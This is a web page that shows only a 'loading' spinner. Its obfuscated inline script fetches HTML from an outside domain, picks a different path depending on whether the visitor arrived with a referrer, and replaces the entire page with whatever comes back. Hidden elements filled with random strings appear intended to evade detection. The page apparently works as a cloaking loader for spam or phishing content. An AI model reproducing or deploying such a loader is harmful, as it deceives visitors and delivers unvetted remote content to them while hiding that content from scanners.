<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Rtmr7ghwG {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Rtmr7ghwG .mRLKpGuci {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Rtmr7ghwG .content {
            line-height: 50px;
            text-align: center
        }

        .Rtmr7ghwG .img {
            width: 100%
        }

        .Rtmr7ghwG .yUsVgLT {
            text-align: center
        }

        .Rtmr7ghwG .yUsVgLT span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Rtmr7ghwG .yUsVgLT span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Rtmr7ghwG .yUsVgLT span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Rtmr7ghwG .yUsVgLT span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Rtmr7ghwG .yUsVgLT span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Rtmr7ghwG .yUsVgLT span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Rtmr7ghwG .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function gsAI8Po1zzOn(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var sE2H5 = gsAI8Po1zzOn('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ sE2H5 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ sE2H5 +".html?a=share";
		}
		
        fUiJKL=url+"#"+new Date().getTime();
        fUiJKL && function() {
            $.get(fUiJKL, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>b0RytO1kZs8</p>
<ul style='display:none' >EeTRa6v4F9Y11mjnMiK8sGDAEPB2jUJWxSzTn9pAegaWzFDfhfd2</ul>
<ul style='display:none' >EeTRa6v4F9Y11mjnMiK8sGDAEPB2jUJWxSzTn9pAegaWzFDfhfd2</ul><div class="Rtmr7ghwG">
    <div class="mRLKpGuci">
        <div class="yUsVgLT">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<li style='display:none' >O28aFJR0n30J4esxoOnEWR2k7El1eNHCKPj7gAkzUqF5B5sXse70sSt2FmitpHaZ8bI476dAXgQDcSXfkAAd8szxNdOAi6ttH4</li>
<a  href='#' style='display:none'>Pi0PlMOizdBx6szYGRb651HNfG8jrd0SdGf26LG7LeVjasCADlE1VZW4vlOdDCYXKZEaht9Q</a>
<p  style='display:none'>qPMnHTRAaQQDeH2J76n1cbIw0</p>
<div style='display:none'>xPvJNlkNuLNGETttLYpMK7EDCbbTTSwVbq2fo4iErdg9ullhlaRa</div>
<img  src='' style='display:none'>
<p  style='display:none'>qPMnHTRAaQQDeH2J76n1cbIw0</p>
<a  href='#' style='display:none'>Pi0PlMOizdBx6szYGRb651HNfG8jrd0SdGf26LG7LeVjasCADlE1VZW4vlOdDCYXKZEaht9Q</a>
<li style='display:none' >O28aFJR0n30J4esxoOnEWR2k7El1eNHCKPj7gAkzUqF5B5sXse70sSt2FmitpHaZ8bI476dAXgQDcSXfkAAd8szxNdOAi6ttH4</li></body>
</html>